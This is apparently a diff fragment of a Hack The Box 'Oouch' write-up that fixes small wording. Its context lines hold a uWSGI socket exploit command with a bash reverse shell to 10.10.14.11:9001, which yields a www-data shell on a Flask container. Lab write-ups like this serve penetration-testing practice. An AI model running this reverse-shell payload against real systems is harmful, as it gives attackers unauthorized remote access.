Kyuu-Ji/htb-write-up/oouch/write-up-oouch.md

 python uwsgi_exp.py -m unix -u /tmp/uwsgi.socket -c 'bash -c "bash -i >& /dev/tcp/10.10.14.11/9001 0>&1"'
 ```

-> NOTE: The exploit wants to import the _bytes_ module, so the lines were it is imported should be removed:
+> NOTE: The exploit wants to import the _bytes_ module, so the lines where it is imported should be removed:

 ```
 sed '/import b/d' uwsgi_exp.py -i
 ```

-After sending the command, the listener on my IP and port starts a reverse shell sessions as _www-data_ on the **Flask container**.
+After sending the command, the listener on my IP and port 9001 starts a reverse shell sessions as _www-data_ on the **Flask container**.

 #### Exploiting DBus with www-data